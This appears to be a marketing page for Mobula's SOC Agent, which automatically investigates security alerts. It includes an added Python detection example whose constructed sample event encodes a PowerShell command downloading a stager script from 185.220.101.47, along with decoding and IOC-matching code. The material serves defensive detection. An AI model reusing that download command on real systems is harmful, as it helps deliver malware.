
Mobula · SOC Agent

Every alert, already investigated.

Mobula's SOC Agent runs the moment a new alert lands - searching logs, resolving entities, and posting a full structured investigation report before any analyst opens the queue.

<60s investigation time
100% alert coverage
AI, fully autonomous
Alert / ALT-2026-4817
HIGH · Suspicious PowerShell execution on WIN-FIN-03
SOC Agent · Investigation running · step 3 of 5
Agent Report · posted 47s after alert
Entity: WIN-FIN-03 / p.morris
Risk score: 87 / 100
Finding: PowerShell spawned from Word with the -EncodedCommand flag. Parent process: WINWORD.EXE. Base64 payload decoded to download a stager from 185.220.x.x
IOCs found: 185.220.101.47 · stager.ps1 · T1059.001
Verdict: INVESTIGATE
01 · Every alert receives an automatic investigation

The moment Mobula ingests an alert, the SOC Agent fires - no manual trigger, no analyst queue wait. Every alert, regardless of severity, gets the same rigorous automated treatment.

Alert Queue
Severity | Alert | Agent Status | Report | Analyst
HIGH | Suspicious PowerShell on WIN-FIN-03 | COMPLETE | 47s | Unassigned
CRITICAL | Ransomware staging detected on FIN-DB-03 | COMPLETE | 38s | m.levy
MEDIUM | Impossible-travel login - m.chen | COMPLETE | 52s | Unassigned
LOW | Service account auth outside business hours | COMPLETE | 29s | Unassigned
02 · Five investigation steps, run in seconds

The agent follows the same rigorous checklist a senior analyst would - but in under a minute, every time, on every alert.

SOC Agent / Investigation Steps
1. Entity resolution: Identifies all hosts, users, and IPs involved. Pulls asset context and recent alert history for each.
2. Log search: Queries SIEM logs around the alert timestamp - parent processes, child spawns, network connections, authentication events.
3. IOC extraction: Extracts all indicators of compromise: IPs, domains, file hashes, command strings. Checks each against threat intel feeds.
4. MITRE mapping: Maps observed behavior to the ATT&CK framework and identifies the tactic and technique with confidence scoring.
5. Verdict and recommendation: Produces a structured report with risk score, key findings, and a recommended next action for the analyst.
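As an added illustration of steps 2 to 5 (not Mobula's own code), a toy triage function over a constructed Sysmon-style process-creation event modelled on the page's finding: PowerShell spawned from WINWORD.EXE with an -EncodedCommand payload. The event, the threat-intel set, the Office parent list and the risk weights are assumptions chosen so the result matches the report shown on the page.

```python
import base64
import re

# Constructed process-creation event (not real telemetry), modelled on the page's finding.
_DECODED_CMD = "Invoke-WebRequest -Uri http://185.220.101.47/stager.ps1 -OutFile stager.ps1"
SAMPLE_EVENT = {
    "host": "WIN-FIN-03", "user": "p.morris",
    "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "command_line": "powershell.exe -NoP -EncodedCommand "
    + base64.b64encode(_DECODED_CMD.encode("utf-16-le")).decode(),
}
# Assumed threat-intel set and Office parent list (hypothetical); a real agent queries live feeds.
KNOWN_BAD_IPS = {"185.220.101.47"}
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}

def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except ValueError:  # malformed base64 (binascii.Error is a ValueError)
        return None

def extract_iocs(text):
    """Step 3: pull IPv4 addresses and script/binary names out of decoded text."""
    ips = set(re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", text))
    files = set(re.findall(r"\b[\w-]+\.(?:ps1|exe|dll|bat|vbs|hta)\b", text, re.I))
    return {"ips": sorted(ips), "files": sorted(files)}

def investigate(event):
    """Steps 2-5 in miniature: parent/child context, IOCs, ATT&CK mapping, verdict."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].upper()
    decoded = decode_encoded_command(event["command_line"])
    iocs = extract_iocs(decoded or "")
    bad = [ip for ip in iocs["ips"] if ip in KNOWN_BAD_IPS]
    checks = [  # (hit, finding text, hypothetical risk weight)
        (parent in OFFICE_PARENTS, f"PowerShell spawned from Office parent {parent}", 40),
        (decoded is not None, "-EncodedCommand flag present; payload decoded", 20),
        (bool(bad), "Payload contacts known-bad IP: " + ", ".join(bad), 27),
    ]
    findings = [text for hit, text, _ in checks if hit]
    score = min(sum(w for hit, _, w in checks if hit), 100)
    technique = "T1059.001" if "powershell" in event["image"].lower() else None  # ATT&CK
    verdict = "INVESTIGATE" if score >= 70 else "REVIEW" if score >= 40 else "BENIGN"
    return {"entity": f'{event["host"]} / {event["user"]}', "risk_score": score,
            "findings": findings, "iocs": iocs, "technique": technique, "verdict": verdict}
```

Running `investigate(SAMPLE_EVENT)` yields the 87 / 100 risk score, the T1059.001 mapping and the INVESTIGATE verdict from the card above; a plain `-File` invocation from explorer.exe scores 0 and is marked BENIGN.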
03 · Analysts open reports, not raw alerts

When an analyst finally opens the alert, the hard work is already done. The investigation report gives them everything they need to make a confident decision - in under 30 seconds.

Alert / ALT-2026-4817 / Agent Report
Entity Context
Host: WIN-FIN-03
User: p.morris
Dept: Finance
Recent alerts: 3 in last 7d
Risk score: 87 / 100
IOCs Detected
External IP: 185.220.101.47
File: stager.ps1
Technique: T1059.001
Parent proc: WINWORD.EXE
Threat intel: KNOWN BAD
Agent Narrative
PowerShell was spawned by WINWORD.EXE on WIN-FIN-03 at 14:22 using a base64-encoded command. The decoded payload contacted 185.220.101.47 - a known C2 infrastructure IP flagged by 7 threat intel feeds. This pattern is consistent with a macro-delivered downloader. The host is in the Finance segment with access to sensitive data stores. Recommend immediate containment.

Autonomous · Instant · Thorough

Every alert investigated - before your analyst opens it.

SOC Agent turns a queue of raw alerts into a stack of ready-to-decide cases. Your analysts spend time on judgment, not legwork.

Mobula SOC Agent · runs fully air-gapped · no data leaves the tenant